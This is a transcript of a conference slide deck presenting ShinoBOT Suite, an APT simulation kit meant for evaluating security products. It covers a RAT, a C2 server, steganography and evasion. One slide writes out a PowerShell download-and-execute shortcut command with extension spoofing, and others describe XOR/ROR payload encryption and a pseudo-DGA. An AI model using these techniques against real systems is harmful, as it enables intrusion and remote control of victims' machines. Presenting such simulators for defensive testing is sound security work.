shinobot suite
DESCRIPTION
ShinoBOT Suite is a cyber attack campaign simulator. This slide was presented at the Black Hat USA 2014 Arsenal.TRANSCRIPT
![Page 1: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/1.jpg)
Shin
oB
OT
Suite
can you prevent APT like me?
ShinoBOTSuite
All bad stuff includedRAT, C&C Server,
Downloader, Dropper, Decoy File, Exploit,
Stegano, Crypto, DGA and more…
@Sh1n0g1
!
APT Making Kit
DO NOT USE THIS ILLEGALLY
ShinoBOT SUITE
The APT Simulator Tool Kit
@Sh1n0g11
![Page 2: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/2.jpg)
About ME
Shota Shinogi @Sh1n0g1http://shinosec.com
Security Researcher at Macnica Networks Corp.Japanese Disty of security/network products
Enthusiast of writing (ethical) malware
Presented ShinoBOT (not Suite) last year at Arsenal
2
![Page 3: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/3.jpg)
ShinoBOT the RAT
ShinoBOT.exe
ShinoBOT is a RAT (simulator)Presented at Black Hat USA 2013 Arsenal It connects to ShinoC2, the C&C Server
using HTTP(S).What you can do with ShinoBOT via ShinoC2
Execute a commandUpload / Download a fileTake a screen shot
It is a SIMULATORit has a GUIyou need the password which is showed on the
GUI to control it
3
![Page 4: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/4.jpg)
What is ShinoBOT Suite
ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly-sophisticated attack campaign.
What is containedExploit (Shortcut contains a malicious script)Malware Delivery Server (ShinoMAL.mooo.com)Downloader/Dropper (ShinoDownloader.exe)RAT (ShinoBOT.exe)C&C Server (ShinoC2]Steganography, crypto, DGA and some evasion
techniques
4
![Page 5: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/5.jpg)
Why ShinoBOT Suite ?
There is a bunch of new security tools to detect/response the unknown threat Sandbox based Malware Detection SystemETDR (Endpoint Threat Detect & Response)SIEM (Security Information & Event Manager)Security Analytics / Network Forensics
It is hard to evaluate those new productsKnown malware will be detected by signature
♦≠ Unknown ThreatTo simulate a realistic APT
♦requires a high skill♦takes too much time♦spends a lot of money using some commercial tools
5
![Page 6: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/6.jpg)
ShinoBOT Suite Campaign
MaliciousShortcut
Downloader
DropperRAT
Decoy File
C&CServer
MalwareDeployServer
dldr_tmp
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication1)Download
2)Execute
img.jpg
3)Drop
6)Decrypt
7)Execute
6
![Page 7: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/7.jpg)
ShinoBOT Suite Campaign
MaliciousShortcut
Downloader
DropperRAT
Decoy File
C&CServer
MalwareDeployServer
dldr_tmp
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication1)Download
2)Execute
img.jpg
3)Drop
6)Decrypt
7)Execute
7
ShinoMAL ShinoC2
ShinoBOT
ShinoDownloader
![Page 8: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/8.jpg)
DEMONSTRATION STEP1
8
![Page 9: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/9.jpg)
9
DEMONSTRATION STEP2
![Page 10: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/10.jpg)
10
DEMONSTRATION STEP3
![Page 11: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/11.jpg)
11
DEMONSTRATION STEP4
![Page 12: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/12.jpg)
12
DEMONSTRATION STEP3
![Page 13: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/13.jpg)
13
DEMONSTRATION RUN
Decoy File
ShinoBOT works in background
![Page 14: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/14.jpg)
14
DEMONSTRATION CONTROL1
To control ShinoBOT (RAT), you need to grab the password, it is to prevent the abuse of ShinoBOT.
ShinoBOT saved its password to the same folder (C:\Users\%USERNAME%\sb.pas)
You can access to the password word file remotely.
\\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas
![Page 15: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/15.jpg)
15
DEMONSTRATION CONTROL2
To control ShinoBOT (RAT), you need to grab the password, it is to prevent the abuse of ShinoBOT.
ShinoBOT saved its password in this text file. (C:\Users\%USERNAME%\sb.pas)
You can access to the password word file remotely.
\\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas
This password protection is to prevent the real guys to abuse ShinoBOT.
![Page 16: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/16.jpg)
16
DEMONSTATION CONTROL3
Access to ShinoBOT.comGo to the host listYour host will appear in the host list
Click the [View/Assign Jobs] link
![Page 17: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/17.jpg)
17
DEMONSTATION CONTROL4
Put the password to see the Loot (result) of the command
Put the password to assign a new job
![Page 18: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/18.jpg)
Technical Detail 1
Malicious Shortcut"target" of the shortcut (all in 1 line)
cmd.exe /c powershell
(new objectSystem.Net.WebClient) .DownloadFile('DOWNLOADERURL', '%TEMP%\LicenseRnd.txt');
& %TEMP%\LicenseRnd.txt&::DECOYFILENAME
POWERSHELL downloads the downloader, and save itCMD executes the downloader(Rnd means random string)CMD ignores this line because :: means a comment 18
![Page 19: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/19.jpg)
Technical Detail 2
Extension SpoofingOn the target of shortcut, there is the line
"%TEMP%\LicenseRnd.txt" (previous slide)Usually, when you double click the file
with .txt, the notepad will launchCMD.exe can execute the
executables(contains the MZ header) with any extension
ShinoBOT Suite uses this techniques to spoof the extension, and make the donwloader hard to be found from the disk
Actually, it is the ShinoDownloader.exe
19
![Page 20: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/20.jpg)
Technical Detail 3
Crypto StuffShinoBOT Suite uses XOR and ROR (4
bit rotate)Key is used just for the XOR, and ROR
is always 4 bitsShinoBOT Suite generates a random
key (200 ~ 255 byte) so it is little bit difficult to decrypt the whole file without having the key
20
![Page 21: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/21.jpg)
Technical Detail 4
SteganographyThe encrypted RAT is hidden in the
kitten image.JPG data
Encrypted RAT
[Binary Visualizer]
21
![Page 22: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/22.jpg)
22
Technical Detail 5
Domain Generation AlgorithmShinoBOT (the RAT) uses pseudo-
DGA.It generates a random host name for
the C2 Server.rrrr.r.shinobot.com" r " is replaced by a random character.
The DNS of shinobot.com responds any host with the C2 server IP address.
![Page 23: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/23.jpg)
All Components are customizable, modulable
ExploitShellCode
Downloader
DropperRAT
Decoy File
C&CServer
MalwareDeployServer
KB1234567.exe
Invitation.pdf
Invitation.pdf(legitimate)
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication1)Download
2)Execute
img.jpg
3)Drop
KB1234567.exe
6)Decrypt
7)Execute
Phishing Email
23
![Page 24: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/24.jpg)
Thank you
Visit my site and get the recipe of ShinoBOT SUITE.
Shin
oB
OT
Suite
can you prevent APT like me
ShinoBOTSuite
All bad stuff includedRAT, C&C Server,
Downloader, Dropper, Decoy File, Exploit,
Stegano, Crypto, DGA and more…
@Sh1n0g1
!
APT Making Kit
Do not use it illegally
http://shinosec.com24